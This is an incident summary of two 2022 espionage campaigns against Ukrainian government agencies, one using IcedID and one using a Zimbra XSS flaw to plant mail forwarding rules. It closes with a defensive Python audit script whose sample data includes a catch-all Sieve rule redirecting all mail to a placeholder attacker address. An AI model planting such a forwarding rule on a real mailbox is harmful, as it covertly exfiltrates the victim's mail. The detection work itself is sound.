Cyber Incident Victim: Government of Ukraine

Date:

Apr 2022

Location:

Ukraine

Summary

Attackers targeted Ukrainian government agencies in two separate campaigns. The first used phishing emails carrying malicious Excel documents to deploy IcedID, a modular banking trojan used here for credential theft and as a loader for further malware. The second used malicious emails to exploit a cross-site scripting vulnerability in the Zimbra mail platform (CVE-2018-6882) and plant email forwarding rules on victim mailboxes for espionage. CERT-UA attributed the campaigns to the threat clusters UAC-0041 and UAC-0097 respectively; both aimed to gain a foothold in internal networks for cyber-espionage against government entities. CERT-UA linked the first cluster to a group previously associated with AgentTesla distribution and the second to a previously unknown actor.

Description

On April 14, 2022, Ukraine's Computer Emergency Response Team (CERT-UA) reported two distinct cyber campaigns targeting Ukrainian government entities. The first campaign involved phishing emails distributing a malicious Excel document titled "Mobilization Register.xls." The file contained a macro that, once the recipient opened the document and allowed its content to run, downloaded and installed IcedID, a modular banking trojan capable of stealing credentials and loading additional payloads. CERT-UA attributed this activity to threat cluster UAC-0041, a group it had previously associated with AgentTesla distribution. The second campaign used emails carrying JPG attachments crafted to exploit CVE-2018-6882, a cross-site scripting (XSS) vulnerability in the Zimbra Collaboration Suite web client. Triggering the XSS in the victim's authenticated browser session let the attackers add email forwarding rules to the victim's mailbox, giving them a continuous copy of incoming mail. CERT-UA assigned this activity to a previously unidentified threat actor tracked as UAC-0097. Both operations aimed to infiltrate government networks for cyber-espionage against critical Ukrainian agencies.

The two campaigns used different techniques but shared the operational goals of network penetration and intelligence gathering. IcedID's role as a loader pointed to follow-on malware stages, while the Zimbra exploit aimed at persistent mailbox monitoring through rule manipulation. CERT-UA confirmed that the campaigns were part of ongoing malicious activity against Ukrainian infrastructure but did not name the affected agencies or quantify any data compromise. The agency publicly documented both intrusion methods, stressing the risk posed by the Zimbra vulnerability and urging administrators to patch immediately. No remediation details were published for the IcedID infections; standard incident response for banking trojans involves removing the malware from affected endpoints, rotating any credentials the host could have exposed, and reviewing network traffic for command-and-control and second-stage downloads. Because a mail forwarding rule persists independently of the victim's password, remediating the Zimbra intrusion also requires auditing affected mailboxes for unauthorized filter and forwarding settings and removing them, not just resetting credentials. The incidents underscored the continuous adversarial focus on Ukrainian governmental systems during the 2022 conflict.
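The mailbox audit the Zimbra campaign calls for can be scripted. The following is an added example, not CERT-UA's tooling or anything published with the incident: it flags Zimbra accounts whose mail is being forwarded to addresses outside the organisation. It assumes the two places a forward can be planted are the per-account Sieve filter script (the zimbraMailSieveScript attribute, where a rule uses the Sieve redirect action) and the zimbraPrefMailForwardingAddress preference, both readable with `zmprov ga <account>`; the account data, the internal domain and the attacker address below are constructed for the example. The rule parser handles the flat, non-nested `if ... { ... }` blocks Zimbra generates and does not attempt full Sieve parsing.

```python
"""Flag Zimbra accounts whose mail is forwarded outside the organisation.

Added example (not from the incident report). Input per account:
  * the Sieve script stored in zimbraMailSieveScript
  * the value of zimbraPrefMailForwardingAddress (may be empty)
Both can be exported with `zmprov ga <account>` (assumption about the
export format; the parser only needs the attribute text itself).
"""
import re
from typing import Dict, List

# Hypothetical organisation: anything not under this domain is "external".
INTERNAL_DOMAINS = {"example.gov.ua"}

# Constructed sample data, not captured from any real system.
SAMPLE_ACCOUNTS = {
    "user1@example.gov.ua": {
        "zimbraMailSieveScript": '''require ["fileinto"];
# rule1
if anyof (header :contains "subject" "invoice") {
    fileinto "Invoices";
}''',
        "zimbraPrefMailForwardingAddress": "",
    },
    "user2@example.gov.ua": {
        # Catch-all rule that copies every incoming message to an outside address.
        "zimbraMailSieveScript": '''require ["copy"];
# forward all
if anyof (true) {
    redirect :copy "collector@attacker.example";
    stop;
}''',
        "zimbraPrefMailForwardingAddress": "",
    },
    "user3@example.gov.ua": {
        # Internal redirect is benign; the preference-level forward is not.
        "zimbraMailSieveScript": '''require ["fileinto"];
if anyof (address :is "from" "hr@example.gov.ua") {
    redirect "archive@example.gov.ua";
}''',
        "zimbraPrefMailForwardingAddress": "mailbox@external.example",
    },
}

# One flat Sieve rule: "if <condition> { <body> }" (no nesting, as Zimbra emits).
RULE_RE = re.compile(r"\bif\s+(?P<cond>.*?)\s*\{(?P<body>.*?)\}", re.DOTALL | re.IGNORECASE)
# Sieve redirect action, with or without the :copy modifier (RFC 3894).
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def is_external(addr: str, internal_domains) -> bool:
    """True unless the address is in an internal domain or one of its subdomains."""
    d = domain_of(addr)
    return not any(d == i or d.endswith("." + i) for i in internal_domains)


def is_catch_all(cond: str) -> bool:
    """A condition of 'true', 'anyof (true)' or 'allof (true)' matches every message."""
    return re.sub(r"[()\s]", "", cond).lower() in {"true", "anyoftrue", "alloftrue"}


def audit_account(attrs: Dict[str, str], internal_domains) -> List[str]:
    findings = []
    for rule in RULE_RE.finditer(attrs.get("zimbraMailSieveScript", "")):
        scope = "ALL mail" if is_catch_all(rule.group("cond")) else "matching mail"
        for addr in REDIRECT_RE.findall(rule.group("body")):
            if is_external(addr, internal_domains):
                findings.append(f"filter redirect -> {addr} ({scope})")
    for addr in re.split(r"[,\s]+", attrs.get("zimbraPrefMailForwardingAddress", "").strip()):
        if addr and is_external(addr, internal_domains):
            findings.append(f"zimbraPrefMailForwardingAddress -> {addr}")
    return findings


def audit_all(accounts, internal_domains) -> Dict[str, List[str]]:
    """Return only the accounts that have at least one external forward."""
    result = {}
    for account, attrs in accounts.items():
        findings = audit_account(attrs, internal_domains)
        if findings:
            result[account] = findings
    return result


if __name__ == "__main__":
    for account, findings in audit_all(SAMPLE_ACCOUNTS, INTERNAL_DOMAINS).items():
        for f in findings:
            print(f"{account}: {f}")
```

Run against a full export, the script lists every mailbox with an outbound forward; a catch-all redirect to an unfamiliar domain, as in the second sample account, is the pattern to treat as a probable compromise and remove, in addition to resetting the account's session and password.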
